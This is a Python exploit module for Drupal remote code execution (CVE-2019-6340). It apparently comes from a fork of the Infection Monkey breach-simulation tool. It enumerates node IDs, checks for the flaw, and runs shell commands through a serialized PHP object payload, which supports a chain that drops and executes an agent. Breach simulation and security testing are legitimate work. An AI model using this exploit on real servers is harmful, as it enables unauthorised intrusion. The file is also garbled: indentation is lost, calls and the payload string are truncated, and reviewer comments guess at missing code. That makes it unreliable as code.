forked from p15670423/monkey
201 lines
7.6 KiB
201 lines
7.6 KiB
"""
Remote Code Execution on Drupal server - CVE-2019-6340.

Implementation is based on: <reference link missing from this copy - TODO restore>
"""
import logging
from urllib.parse import urljoin
import requests
from common.common_consts.timeouts import LONG_REQUEST_TIMEOUT, MEDIUM_REQUEST_TIMEOUT
from import remove_port
from infection_monkey.exploit.web_rce import WebRCE
from infection_monkey.model import ID_STRING
# Module author metadata.
__author__ = "Ophir Harpaz"
# Module-level logger, named after this module via __name__.
LOG = logging.getLogger(__name__)
# Exploiter for Drupal servers, built on top of the WebRCE base class.
# NOTE(review): the class body has lost its indentation in this copy of the file.
class DrupalExploiter(WebRCE):
# Operating systems this exploiter declares as targets.
_TARGET_OS_TYPE = ["linux", "windows"]
# Human-readable name of the exploited service (presumably used by WebRCE - confirm).
_EXPLOITED_SERVICE = "Drupal Server"
def __init__(self, host):
    """
    Initialise the exploiter by delegating to the WebRCE constructor.

    :param host: target host object, passed through unchanged to the base class
    """
    super(DrupalExploiter, self).__init__(host)
def get_exploit_config(self):
    """
    Return the base exploit configuration with Drupal-specific overrides.

    We override this function because the exploit requires a special extension in the URL,
    e.g. an exploited URL would be <host>:<port>/node/3.

    :return: the Drupal exploit config
    """
    exploit_config = super(DrupalExploiter, self).get_exploit_config()
    exploit_config["url_extensions"] = [
        "node/",  # In Linux, no path is added
    ]  # However, Bitnami installations are under /drupal
    # NOTE(review): the comment above mentions a /drupal prefix, yet only "node/" is listed;
    # confirm whether a second extension is missing from this copy of the file.
    exploit_config["dropper"] = True
    return exploit_config
# Collects exploitable node URLs: for each candidate URL it looks up node IDs with
# find_exploitbale_article_ids, joins each ID onto the URL and tests the result with
# self.check_if_exploitable.
# NOTE(review): this block is incomplete in this copy of the file. The docstring delimiters,
# the `try:` matching the `except` below, the heads of the logging calls (shown as `|`), the
# head of the call that ends in `) # This is for report...`, and the statements that followed
# `if node_ids is None:`, `if self.check_if_exploitable(...)` and `if stop_checking:` are
# missing. The code lines are left exactly as found; restore them from the original file.
def add_vulnerable_urls(self, potential_urls, stop_checking=False):
We need a specific implementation of this function in order to add the URLs *with the
node IDs*.
We therefore check, for every potential URL, all possible node IDs.
:param potential_urls: Potentially-vulnerable URLs
:param stop_checking: Stop if one vulnerable URL is found
:return: None (in-place addition)
for url in potential_urls:
node_ids = find_exploitbale_article_ids(url)
if node_ids is None:
|"Could not find a Drupal node to attack")
for node_id in node_ids:
# The node ID is appended to the candidate URL to form the URL that is actually tested.
node_url = urljoin(url, str(node_id))
if self.check_if_exploitable(node_url):
) # This is for report. Should be refactored in the future
if stop_checking:
# Any exception raised while checking a URL is logged, not propagated.
except Exception as e: # We still don't know which errors to expect
LOG.error(f"url {url} failed in exploitability check: {e}")
if not self.vulnerable_urls:
|"No vulnerable urls found")
# Heuristic check of a node URL that does not run a command: it sends the payload from
# build_exploitability_check_payload and inspects the response.
# NOTE(review): this block is incomplete in this copy of the file. The docstring delimiters,
# most of the requests.get(...) argument list (including its closing parenthesis) and the head
# of the logging call (shown as `|`) are missing. The code lines are left exactly as found.
# NOTE(review): the docstring promises "Vulnerable URL if exploitable", but the visible
# return statements yield booleans.
def check_if_exploitable(self, url):
Check if a certain URL is exploitable.
We use this specific implementation (and not simply run self.exploit) because this
function does not "waste"
a vulnerable URL. Namely, we're not actually exploiting, merely checking using a heuristic.
:param url: Drupal's URL and port
:return: Vulnerable URL if exploitable, otherwise False
payload = build_exploitability_check_payload(url)
response = requests.get( # noqa: DUO123
headers={"Content-Type": "application/hal+json"},
# A cached response is treated as "not exploitable".
if is_response_cached(response):
|"Checking if node {url} is vuln returned cache HIT, ignoring")
return False
# Otherwise the verdict is whether this marker text appears in the response body.
return "INVALID_VALUE does not correspond to an entity on this site" in response.text
# Runs `command` against `url`: the command is prefixed with an echo of ID_STRING, wrapped by
# build_cmd_execution_payload, sent with requests.get, and the text after the last ID_STRING
# in the response is returned.
# NOTE(review): this block is incomplete in this copy of the file. Most of the
# requests.get(...) argument list (including its closing parenthesis) and the head of the
# logging call (shown as `|`) are missing. The code lines are left exactly as found.
def exploit(self, url, command):
# pad a easy search replace output:
cmd = f"echo {ID_STRING} && {command}"
# The payload's link is built from the URL with its port removed.
base = remove_port(url)
payload = build_cmd_execution_payload(base, cmd)
r = requests.get( # noqa: DUO123
headers={"Content-Type": "application/hal+json"},
# A cache HIT is only reported here; execution continues.
if is_response_cached(r):
|"Exploiting {url} returned cache HIT, may have failed")
# A missing marker is only warned about; the split below then returns the whole body.
if ID_STRING not in r.text:
LOG.warning("Command execution _may_ have failed")
result = r.text.split(ID_STRING)[-1]
return result
def get_target_url(self):
    """
    Hand out a fresh vulnerable URL every time self.exploit is about to be invoked.

    Reusing the same URL eliminates its exploitability because of caching reasons, so the
    URL is removed from ``self.vulnerable_urls`` as it is returned.

    :return: vulnerable URL to exploit
    :raises: whatever ``self.vulnerable_urls.pop()`` raises when no URLs are left
    """
    return self.vulnerable_urls.pop()
def are_vulnerable_urls_sufficient(self):
    """
    For the Drupal exploit, 5 distinct URLs are needed to perform the full attack.

    :return: Whether the list of vulnerable URLs has at least 5 elements.
    """
    # We need 5 URLs for a "full-chain": check remote files, check architecture, drop monkey,
    # chmod it and run it.
    num_urls_needed_for_full_exploit = 5
    num_available_urls = len(self.vulnerable_urls)
    result = num_available_urls >= num_urls_needed_for_full_exploit
    if not result:
        # NOTE(review): the call wrapping this message was missing from this copy of the
        # file; LOG.info is assumed - confirm the intended log level.
        LOG.info(
            f"{num_urls_needed_for_full_exploit} URLs are needed to fully exploit a "
            f"Drupal server "
            f"but only {num_available_urls} found"
        )
    return result
def is_response_cached(r: requests.Response) -> bool:
    """
    Check if a response had the cache header.

    :param r: response whose headers are inspected
    :return: True only when the ``X-Drupal-Cache`` header is present and equals ``"HIT"``
    """
    # One .get() covers both the missing-header case and the non-HIT case.
    return r.headers.get("X-Drupal-Cache") == "HIT"
def find_exploitbale_article_ids(base_url: str, lower: int = 1, upper: int = 100) -> set:
    """
    Find target articles that do not 404 and are not cached.

    Every node ID in the half-open range ``[lower, upper)`` is joined onto *base_url* and
    requested once.

    :param base_url: URL the node ID is joined onto (via ``urljoin``)
    :param lower: first node ID to probe (inclusive)
    :param upper: node ID at which probing stops (exclusive)
    :return: set of node IDs that answered with status 200 and were not served from cache
    """
    articles = set()
    for node_id in range(lower, upper):
        node_url = urljoin(base_url, str(node_id))
        response = requests.get(  # noqa: DUO123
            node_url, verify=False, timeout=LONG_REQUEST_TIMEOUT
        )
        if response.status_code != 200:
            continue
        if is_response_cached(response):
            # NOTE(review): the head of this logging call was missing from this copy of the
            # file; LOG.info with an f-string is assumed - confirm the intended log level.
            LOG.info(f"Found a cached article at: {node_url}, skipping")
        else:
            # NOTE(review): this branch was missing from this copy of the file. It is
            # restored because the function returns `articles` and the docstring promises
            # the non-cached hits; the ID (not the URL) is stored since the caller joins
            # str(node_id) onto its own URL - confirm against the original file.
            articles.add(node_id)
    return articles
def build_exploitability_check_payload(url):
    """
    Build the JSON-serializable body used to probe a node URL for exploitability.

    The ``_links.type.href`` entry is the absolute path ``/rest/type/node/INVALID_VALUE``
    resolved against *url*, so only the scheme and host (with port) of *url* are kept.

    :param url: URL of the node being checked
    :return: payload dictionary
    """
    return {
        # urljoin already returns a string, so no extra formatting is needed.
        "_links": {"type": {"href": urljoin(url, "/rest/type/node/INVALID_VALUE")}},
        "type": {"target_id": "article"},
        "title": {"value": "My Article"},
        "body": {"value": ""},
    }
# Builds the request body that carries the command: a "link" entry whose "options" string has
# its |size| and |command| placeholders replaced by len(cmd) and cmd, plus a "_links" entry
# pointing at /rest/type/shortcut/default resolved against `base`.
# NOTE(review): this block is incomplete in this copy of the file. Most of the "options"
# string literal (it looks like a serialized PHP object - confirm) and the closing brackets
# of the "link" list and of the payload dict are missing. The code lines are left exactly as
# found; restore them from the original file.
def build_cmd_execution_payload(base, cmd):
payload = {
"link": [
"value": "link",
"options": 'O:24:"GuzzleHttp\\Psr7\\FnStream":2:{s:33:"\u0000'
# The placeholders are filled in after the literal pieces are concatenated.
"".replace("|size|", str(len(cmd))).replace("|command|", cmd),
"_links": {"type": {"href": f"{urljoin(base, '/rest/type/shortcut/default')}"}},
return payload